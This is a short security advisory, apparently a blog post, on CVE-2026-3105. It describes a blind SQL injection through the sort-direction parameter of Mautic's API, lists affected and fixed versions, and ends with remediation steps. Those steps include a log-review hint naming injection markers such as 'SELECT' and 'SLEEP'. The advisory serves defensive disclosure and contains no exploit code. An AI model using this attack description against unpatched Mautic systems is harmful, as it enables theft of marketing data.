Mautic SQLi: When "Order By" Becomes "Pwned By"
Vulnerability ID: CVE-2026-3105
CVSS Score: 7.6
Published: 2026-02-25
Mautic, the open-source darling of marketing automation, recently patched a high-severity SQL Injection vulnerability (CVE-2026-3105) that turns a mundane API sorting feature into a database exfiltration pipeline. By failing to validate the direction of a sort (ASC/DESC), the application allowed attackers to append arbitrary SQL commands directly into the query structure. This deep dive explores how a classic 'Order By' injection works in modern ORM environments and why input validation remains the unshakeable law of the land.
TL;DR
Unvalidated input in Mautic's API sort direction parameter allows for Blind SQL Injection via the ORDER BY clause. Attackers can exfiltrate sensitive marketing data. Fixed in versions 4.4.19, 5.2.10, 6.0.8, and 7.0.1.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-89 (SQL Injection)
- CVSS Score: 7.6 (High)
- Attack Vector: Network (API)
- Privileges Required: Low (Authenticated API User)
- Exploit Status: PoC Available (Theoretical)
- Confidentiality Impact: High
Affected Systems
- Mautic Marketing Automation
-
Mautic: >= 2.10.0 < 4.4.19 (Fixed in:
4.4.19) -
Mautic: >= 5.0.0 < 5.2.10 (Fixed in:
5.2.10) -
Mautic: >= 6.0.0 < 6.0.8 (Fixed in:
6.0.8) -
Mautic: >= 7.0.0 < 7.0.1 (Fixed in:
7.0.1)
Exploit Details
- NVD: Blind SQL injection via sort parameter.
Mitigation Strategies
- Input Validation (Allowlisting)
- WAF Filtering
- Database Least Privilege
Remediation Steps:
- Identify your current Mautic version.
- Backup your database and codebase.
- Apply the vendor patch: Update to 4.4.19, 5.2.10, 6.0.8, or 7.0.1.
- Verify the update by checking the version in the footer or
app/version.txt. - Review API logs for past requests containing 'SELECT', 'SLEEP', or parentheses in the 'dir' parameter.
References
Read the full report for CVE-2026-3105 on our website for more details including interactive diagrams and full exploit analysis.
Top comments (0)